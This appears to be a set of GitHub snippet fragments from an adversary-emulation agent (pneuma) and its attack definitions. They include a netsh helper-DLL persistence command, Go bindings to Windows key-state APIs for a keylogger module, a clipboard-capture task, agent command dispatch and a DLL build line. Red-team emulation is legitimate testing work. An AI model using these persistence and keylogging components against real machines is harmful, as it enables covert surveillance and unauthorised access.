This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
platforms: | |
windows: | |
exec: | |
command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll' | |
payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll' | |
cmd: | |
command: 'netsh.exe add helper #{agent.location}\..\netShHelperDll.dll' | |
payload: '#{operator.payloads}/persistence/netsh/netShHelperDll.dll' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var ( | |
user32 = syscall.NewLazyDLL("user32.dll") | |
getAsyncKeyState = user32.NewProc("GetAsyncKeyState") | |
getKeyboardLayout = user32.NewProc("GetKeyboardLayout") | |
getKeyState = user32.NewProc("GetKeyState") | |
toUnicodeEx = user32.NewProc("ToUnicodeEx") | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
platforms: | |
windows: | |
keyword: | |
command: module.collect.keyLogger | |
payload: "#{operator.payloads}/pneumaEX/collect/collect-windows.exe" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if executor == "keyword" { | |
task := splitMessage(message, '.') | |
if task[0] == "module" { | |
var err error | |
if !contains(util.InstalledModuleKeywords, task[1] + "." + task[2]) { | |
err = util.InstallModule(task[1], payloadPath) | |
} | |
if err != nil { | |
return err.Error(), 1, -1 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if executor == "keyword" { | |
task := splitMessage(message, '.') | |
if task[0] == "api" { | |
return CallNativeAPI(task[1]) | |
} else if task[0] == "config" { | |
return updateConfiguration(task[1], agent) | |
} | |
return "Keyword selected not available for agent", 0, 0 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//+build !windows | |
package commands | |
func CallNativeAPI(task string) (string, int, int) { | |
return "Not implemented for non-Windows platforms", 1, -1 | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package commands | |
import ( | |
"encoding/json" | |
"log" | |
"os" | |
"syscall" | |
"unsafe" | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//+build cgo | |
package main | |
import "C" | |
import ( | |
"flag" | |
"github.com/preludeorg/pneuma/sockets" | |
"github.com/preludeorg/pneuma/util" | |
"log" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
GOOS=windows CC=x86_64-w64-mingw32-gcc CGO_ENABLED=1 go build --buildmode=c-shared --ldflags='-s -w -X main.key="MYKEYISBESTKEY" -extldflags "-Wl,--nxcompat -Wl,--dynamicbase -Wl,--high-entropy-va"' -o payloads/pneuma.dll main.go; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id: 2897b095-3356-456f-876c-3103f91352ab | |
metadata: | |
version: 1 | |
authors: | |
- khyberspache | |
tags: | |
- thinktank | |
name: Capture clipboard using a module | |
description: | | |
Installs a user-land clipboard capture binary and collects the clipboard every 30 seconds for 10 minutes. |